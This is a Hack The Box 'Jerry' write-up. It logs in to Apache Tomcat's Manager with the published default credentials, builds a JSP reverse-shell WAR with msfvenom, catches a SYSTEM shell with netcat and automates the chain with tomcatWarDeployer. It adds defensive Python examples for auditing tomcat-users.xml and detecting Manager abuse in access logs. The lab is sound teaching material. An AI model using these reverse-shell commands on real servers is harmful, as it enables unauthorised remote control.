HTB - Jerry

Jerry

Getting Root:

  1. Jerry is running Apache Tomcat on port 8080

  2. Failed login error message shows default creds for the Host Manager App

  3. We upload a reverse JSP shell

  4. We get SYSTEM on the box; both flags are in the same directory

Tools Used:

nmap, msfvenom, tomcatWarDeployer.py

Nmap

nmap -sC -sV -p- -oA nmap/Jerry 10.10.10.95
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 22:54 EST
Nmap scan report for 10.10.10.95
Host is up (0.041s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Port 8080 Apache Tomcat

Default credentials are shown when we fail to authenticate with admin:admin on the Host Manager App: user tomcat, password s3cret
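The weakness this step relies on is a Manager account that still uses one of the example credential pairs Tomcat itself publishes. The following defender-side check is an added example, not part of the original writeup and not Jerry's configuration: it parses a tomcat-users.xml document and flags accounts that use a published default pair, privileged accounts with short passwords, and accounts that hold both manager-gui and manager-script. The entries in KNOWN_DEFAULTS are the pairs shipped as examples in Tomcat's tomcat-users.xml and Manager 401 page; the 12-character length threshold, the check names and both sample configs are my own assumptions.

```python
import xml.etree.ElementTree as ET

# Credential pairs that appear as examples in Tomcat's own tomcat-users.xml
# and in the Manager app's 401 error page (tomcat/s3cret is the pair Jerry
# exposes). They are public knowledge, so a live account using one of them
# is equivalent to having no password at all.
KNOWN_DEFAULTS = {
    ("tomcat", "tomcat"),
    ("tomcat", "s3cret"),
    ("admin", "admin"),
    ("both", "tomcat"),
    ("role1", "tomcat"),
}

# Roles that grant deployment or administrative rights through the
# Manager and Host Manager applications.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

MIN_PASSWORD_LENGTH = 12  # assumed policy threshold, not a Tomcat setting


def audit_tomcat_users(xml_text):
    """Return a list of findings (dicts) for one tomcat-users.xml document."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        # tomcat-users.xml is namespaced; compare on the local tag name only
        if elem.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES

        if (name, password) in KNOWN_DEFAULTS:
            findings.append({
                "user": name, "check": "default-credentials",
                "severity": "high" if privileged else "medium",
            })
        if privileged and len(password) < MIN_PASSWORD_LENGTH:
            findings.append({"user": name, "check": "short-password", "severity": "medium"})
        # Tomcat's Manager documentation advises against giving one account
        # both the HTML (manager-gui) and the scripting (manager-script) role.
        if {"manager-gui", "manager-script"} <= roles:
            findings.append({"user": name, "check": "gui-plus-script", "severity": "medium"})
    return findings


# Constructed configs for this example; neither is taken from the box.
WEAK_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
</tomcat-users>
"""

HARDENED_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-script"/>
  <user username="deploy-ci" password="REPLACE-WITH-LONG-RANDOM-SECRET" roles="manager-script"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for label, doc in (("weak", WEAK_TOMCAT_USERS), ("hardened", HARDENED_TOMCAT_USERS)):
        for f in audit_tomcat_users(doc):
            print(f"[{label}] {f['severity']:6} {f['check']:20} user={f['user']}")
```

Run against the weak config it reports a high-severity default-credentials finding plus the two medium ones; the hardened config, which keeps a single scripting-only account with a long secret, produces nothing. The password check is deliberately coarse: the real fix on an exposed instance is to remove the Manager and Host Manager webapps entirely, or at least restrict them with a RemoteAddrValve, rather than to rely on password strength.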

Generate and upload a JSP Reverse Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -f war > shell.war

Getting the shell

rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>systeminfo
systeminfo

Host Name:                 JERRY
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-00112-46014-AA570
Original Install Date:     6/18/2018, 11:30:45 PM
System Boot Time:          3/2/2020, 12:55:40 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,393 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 4,064 MB
Virtual Memory: In Use:    735 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB

Flags

Both flags are under the same directory

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,577,974,784 bytes free

C:\Users\Administrator\Desktop\flags>

Automating the Exploit

Using tomcatWarDeployer, an automated tool by mgeeky (https://github.com/mgeeky/tomcatWarDeployer), the whole chain runs in one command:

./tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.20 -p 9001 10.10.10.95:8080

        tomcatWarDeployer (v. 0.5.2)
        Apache Tomcat auto WAR deployment & launching tool
        Mariusz B. / MGeeky '16-18

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: 10.10.14.20:9001.
INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.
INFO:   At: "http://10.10.10.95:8080/manager"
INFO: It looks that the application with specified name "jsp_app" has not been deployed yet.
INFO: WAR DEPLOYED! Invoking it...
INFO: ------------------------------------------------------------
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/
INFO:
Happy pwning. Here take that password for web shell: 'sCNUCUbpUYCt'
INFO: ------------------------------------------------------------

INFO: Connected with: nt authority\system@JERRY

C:\apache-tomcat-7.0.88> whoami /all

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18
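Every step of that chain, whether done by hand or by the tool, leaves a trail in Tomcat's access log: failed Manager logins, an authenticated request to a Manager deploy endpoint, and then traffic to a context that did not exist before. The detector below is an added example, not part of the writeup or of tomcatWarDeployer: it parses lines in Tomcat's default AccessLogValve "common" pattern and raises alerts on those three signals. The sample log, the failed-login threshold, the allowlist of expected contexts and the rule names are all constructed assumptions for this illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample in Tomcat's default AccessLogValve "common" pattern
# (%h %l %u %t "%r" %s %b). Hosts, user, nonce and timestamps are made up
# for this example and are not copied from a real log.
SAMPLE_ACCESS_LOG = """\
10.10.14.20 - - [02/Mar/2020:12:56:58 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.20 - - [02/Mar/2020:12:56:59 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.20 - - [02/Mar/2020:12:57:00 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.20 - tomcat [02/Mar/2020:12:57:05 +0200] "GET /manager/html HTTP/1.1" 200 11404
10.10.14.20 - tomcat [02/Mar/2020:12:57:20 +0200] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=EXAMPLENONCE HTTP/1.1" 200 12345
10.10.14.20 - - [02/Mar/2020:12:57:21 +0200] "GET /jsp_app/ HTTP/1.1" 200 1290
10.10.10.1 - - [02/Mar/2020:13:01:00 +0200] "GET /docs/ HTTP/1.1" 200 8110
"""

CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Manager endpoints that create or replace a web application, covering both
# the HTML interface and the text (scripting) interface.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/html/deploy",
                "/manager/text/deploy", "/manager/deploy")

# Contexts expected on this instance; anything else reached right after a
# deployment is treated as the newly dropped application.
KNOWN_CONTEXTS = {"", "manager", "host-manager", "docs", "examples"}

FAILED_LOGIN_THRESHOLD = 3  # assumed tuning value


def parse_line(line):
    """Parse one common-format line into a dict, or return None if malformed."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urlsplit(rec["target"]).path
    rec["status"] = int(rec["status"])
    return rec


def detect_manager_abuse(log_text):
    """Return a list of alert dicts in the order the evidence appears."""
    alerts = []
    failed = Counter()      # host -> 401/403 responses from /manager
    deployers = set()       # hosts that completed a deploy request
    seen_contexts = set()   # (host, context) already alerted on

    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        host, path, status = rec["host"], rec["path"], rec["status"]
        context = path.strip("/").split("/", 1)[0]

        # 1. Repeated authentication failures against the Manager app.
        if path.startswith("/manager/") and status in (401, 403):
            failed[host] += 1
            if failed[host] == FAILED_LOGIN_THRESHOLD:
                alerts.append({"rule": "manager-auth-failures", "host": host,
                               "severity": "medium"})

        # 2. A successful request to a deployment endpoint.
        if path.startswith(DEPLOY_PATHS) and status == 200:
            alerts.append({"rule": "manager-deploy", "host": host,
                           "user": rec["user"], "severity": "high"})
            deployers.add(host)

        # 3. The deploying host then reaches a context outside the allowlist.
        if (host in deployers and status == 200
                and context not in KNOWN_CONTEXTS
                and (host, context) not in seen_contexts):
            seen_contexts.add((host, context))
            alerts.append({"rule": "post-deploy-access", "host": host,
                           "context": context, "severity": "high"})
    return alerts


if __name__ == "__main__":
    for a in detect_manager_abuse(SAMPLE_ACCESS_LOG):
        print(a)
```

On the sample it fires three alerts in sequence: the third 401 from the same host, the authenticated POST to /manager/html/upload, and the first hit on /jsp_app/ from that host. In production, feed it the live access_log, add your CI or deployment host as an exception to the deploy rule, and pair it with the mitigation itself: on an Internet-facing Tomcat the Manager and Host Manager webapps should be removed or restricted with a RemoteAddrValve so that the deploy endpoint is never reachable from an arbitrary source.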

According to the wiki, this tool has been tested with the following versions:

TESTED

  • Apache Tomcat/5.5.35

  • Apache Tomcat/6.?

  • Apache Tomcat/7.0.52

  • Apache Tomcat/7.0.56

  • Apache Tomcat/8.0.33
